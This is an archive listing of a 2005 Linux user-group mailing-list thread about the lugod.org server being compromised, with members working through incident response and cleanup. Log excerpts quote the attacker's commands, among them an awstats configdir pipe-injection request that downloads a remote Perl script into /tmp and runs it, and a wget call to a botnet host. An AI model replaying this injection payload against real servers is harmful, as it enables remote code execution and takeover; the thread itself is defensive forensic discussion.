Re: [vox-tech] lugod.org cracked?

2005-02-16 Thread Karsten M. Self
on Tue, Feb 15, 2005 at 02:35:49PM -0800, Rod Roark ([EMAIL PROTECTED]) wrote: I think I found the point of entry. From the lugod.org apache log: 65.2.252.155 - - [14/Feb/2005:19:31:37 -0800] POST

Re: [vox-tech] lugod.org cracked?

2005-02-16 Thread Bill Kendrick
On Wed, Feb 16, 2005 at 04:21:45AM -0800, Karsten M. Self wrote: awstats was a PoE for a system I have occasional use of. You might want to Google for / ask about Rick Moen's discovery of global variables in PHP. Discussion on the BAD (Bay Area Debian) list. They've been disabled, and I've

[vox-tech] lugod.org cracked?

2005-02-15 Thread Rod Roark
I found that something was sucking up all my bandwidth late this morning. ps -aux showed this: apache 3267 0.0 0.0 2560 1024 ? S 11:14 0:00 sh -c wget leblocks.sytes.net/botnet | grep abcdeee 21 31 apache 3268 0.0 0.1 3060 1460 ? S 11:14 0:00 wget

Re: [vox-tech] lugod.org cracked?

2005-02-15 Thread ME
Most common trojan/exploit is for irc relays. Guess for entry? Did you upgrade php and apache after those security holes were found a while back? Could you send me a copy of the binary files you have found in /tmp/.image? (Thanks.) -ME Rod Roark said: I found that something was sucking up all

Re: [vox-tech] lugod.org cracked?

2005-02-15 Thread ME
2 tools: 1) Rootkit with local exploits 2) IRC Relay with authentication and bounce... probably a file server for dcc requests of pr0n, movies, or music. You will want to down the box and run some integrity checking scripts to verify the applications installed are from the packages you have

Re: [vox-tech] lugod.org cracked?

2005-02-15 Thread ME
Also, you will want to look at processes that are still running. Check out inetd. Use your fu from /proc/PID/*exe* and dump to files and service daemons. Do a cmp of the dumped data with the actual executable on disk. If the item in memory != app on disk, that is a sign that the service you see

Re: [vox-tech] lugod.org cracked?

2005-02-15 Thread Rod Roark
I'm going on the assumption currently that they broke in via apache and did not get root... nothing suggests otherwise so far. I've killed all apache processes and am checking all files and directories writable by apache. Thanks, -- Rod On Tuesday 15 February 2005 01:14 pm, ME wrote: Also,

Re: [vox-tech] lugod.org cracked?

2005-02-15 Thread Rod Roark
I think I found the point of entry. From the lugod.org apache log: 65.2.252.155 - - [14/Feb/2005:19:31:37 -0800] POST /awstats/awstats.pl?configdir=|echo%20;echo%20;cd%20/tmp;wget%20www.commandt.org/a;perl%20a;%20rm%20a;ec ho%20;echo| HTTP/1.0 200 525 - Mozilla/4.0 (compatible; MSIE 6.0b;

Re: [vox-tech] lugod.org cracked?

2005-02-15 Thread Rod Roark
In particular: http://www.idefense.com/application/poi/display?id=185&type=vulnerabilities which includes this gem: An attacker can cause arbitrary commands to be executed by prefixing them with the | character. -- Rod On Tuesday 15 February 2005 02:35 pm, Rod Roark wrote: I think I found

Re: [vox-tech] lugod.org cracked?

2005-02-15 Thread Rick Moen
Quoting Rod Roark ([EMAIL PROTECTED]): I think I found the point of entry. From the lugod.org apache log: 65.2.252.155 - - [14/Feb/2005:19:31:37 -0800] POST /awstats/awstats.pl?configdir=|echo%20;echo%20;cd%20/tmp;wget%20www.commandt.org/a;perl%20a;%20rm%20a;ec ho%20;echo| HTTP/1.0 200

Re: [vox-tech] lugod.org cracked?

2005-02-15 Thread Rick Moen
Quoting ME ([EMAIL PROTECTED]): You will want to down the box and run some integrity checking scripts to verify the applications installed are from the packages you have installed. Rod is certainly qualified to choose his own poison, but this is what I did: o Bring down system. Secure best

Re: [vox-tech] lugod.org cracked?

2005-02-15 Thread ME
Rick Moen said: Quoting ME ([EMAIL PROTECTED]): You will want to down the box and run some integrity checking scripts to verify the applications installed are from the packages you have installed. Rod is certainly qualified to choose his own poison, but this is what I did: [chop] I would